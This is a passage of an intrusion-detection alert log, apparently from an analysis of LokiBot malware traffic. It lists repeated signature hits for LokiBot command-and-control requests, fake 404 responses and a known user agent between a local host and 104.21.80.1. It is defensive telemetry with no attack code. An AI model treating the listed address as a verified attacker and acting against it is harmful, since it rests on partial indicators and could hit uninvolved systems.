2025-02-25T15:39:01.151194+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:03.225173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:05.179203+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.80.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:09.425648+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49707	TCP
2025-02-25T15:37:11.357004+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49708	TCP
2025-02-25T15:37:17.310199+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49711	TCP
2025-02-25T15:37:21.224827+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49725	TCP
2025-02-25T15:37:25.205421+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49752	TCP
2025-02-25T15:37:27.149933+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49764	TCP
2025-02-25T15:37:29.122307+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49779	TCP
2025-02-25T15:37:36.866045+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49832	TCP
2025-02-25T15:37:38.835368+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49846	TCP
2025-02-25T15:37:42.683388+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49873	TCP
2025-02-25T15:37:44.606840+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49886	TCP
2025-02-25T15:37:46.553687+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49900	TCP
2025-02-25T15:37:48.500381+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49912	TCP
2025-02-25T15:37:50.284138+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49927	TCP
2025-02-25T15:37:52.097085+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49938	TCP
2025-02-25T15:37:54.037464+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49951	TCP
2025-02-25T15:37:55.989464+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	49966	TCP
2025-02-25T15:38:01.591707+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50004	TCP
2025-02-25T15:38:07.695990+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50009	TCP
2025-02-25T15:38:09.625716+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50010	TCP
2025-02-25T15:38:11.592157+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50011	TCP
2025-02-25T15:38:15.306085+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50013	TCP
2025-02-25T15:38:17.256006+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50014	TCP
2025-02-25T15:38:19.194866+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50015	TCP
2025-02-25T15:38:23.051658+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50017	TCP
2025-02-25T15:38:24.980448+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50018	TCP
2025-02-25T15:38:26.767054+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50019	TCP
2025-02-25T15:38:29.022378+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50020	TCP
2025-02-25T15:38:32.861222+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50022	TCP
2025-02-25T15:38:36.739222+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50024	TCP
2025-02-25T15:38:42.579719+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50027	TCP
2025-02-25T15:38:44.447602+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50028	TCP
2025-02-25T15:38:46.378746+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50029	TCP
2025-02-25T15:38:48.189651+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50030	TCP
2025-02-25T15:38:50.260788+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50031	TCP
2025-02-25T15:38:52.218782+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50032	TCP
2025-02-25T15:38:54.168628+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50033	TCP
2025-02-25T15:38:58.059915+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50035	TCP
2025-02-25T15:39:01.909519+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50037	TCP
2025-02-25T15:39:03.986284+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50038	TCP
2025-02-25T15:39:05.951655+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.5	50039	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:07.419216+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:09.420736+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:11.352081+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:13.245782+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:15.203334+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:17.303127+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:19.261541+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:21.219928+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:23.245148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:25.200397+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:27.145008+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:29.117371+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:31.069825+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.994691+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.936276+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.860421+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:38.830471+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:40.743613+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:42.675209+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:44.600916+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:46.548764+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:48.492058+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:50.279009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:52.092131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:54.032528+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:55.982742+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:57.886134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.770383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:01.586779+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:03.857568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.747097+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:07.691018+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:09.620745+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:11.587199+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:13.469240+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:15.301113+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:17.251007+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:19.189291+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:21.132720+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:23.046794+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:24.975433+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:26.762045+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:29.017491+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:30.915398+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.856227+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:34.781548+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:36.734248+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:38.674351+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:40.633202+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:42.574819+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:44.442666+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:46.373803+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:48.184312+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:50.254935+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:52.206854+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:54.163663+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:56.087276+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:58.054933+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:59.986604+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:39:01.904643+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:03.981302+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:05.946773+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.80.1	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:07.419216+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:09.420736+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:11.352081+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:13.245782+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:15.203334+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:17.303127+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:19.261541+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:21.219928+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:23.245148+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:25.200397+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:27.145008+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:29.117371+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:31.069825+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.994691+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.936276+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.860421+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:38.830471+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:40.743613+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:42.675209+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:44.600916+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:46.548764+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:48.492058+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:50.279009+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:52.092131+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:54.032528+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:55.982742+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:57.886134+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.770383+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:01.586779+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:03.857568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.747097+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:07.691018+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:09.620745+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:11.587199+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:13.469240+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:15.301113+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:17.251007+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:19.189291+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:21.132720+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:23.046794+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:24.975433+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:26.762045+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:29.017491+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:30.915398+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.856227+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:34.781548+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:36.734248+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:38.674351+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:40.633202+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:42.574819+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:44.442666+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:46.373803+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:48.184312+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:50.254935+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:52.206854+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:54.163663+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:56.087276+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:58.054933+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:59.986604+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:39:01.904643+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:03.981302+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:05.946773+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.80.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:03.839421+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:10.582091+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:12.501734+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:18.470114+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:22.516317+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:26.362703+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:28.324980+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:30.282636+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:38.017545+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:39.994212+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:43.834928+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:45.768346+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:47.703387+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:49.658365+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:51.470383+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:53.252481+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:55.190339+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:57.146055+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:03.129955+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:08.844857+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:10.801171+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:12.738105+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:16.455340+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:18.421744+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:20.374351+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:24.210909+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:26.128727+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:27.930674+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:30.192910+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:34.049302+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:37.927242+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:43.756691+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:45.617770+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:47.543151+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:49.503055+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:51.426845+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:53.402371+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:55.331665+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:59.246009+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:39:01.151194+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:03.225173+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:05.179203+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50039	104.21.80.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

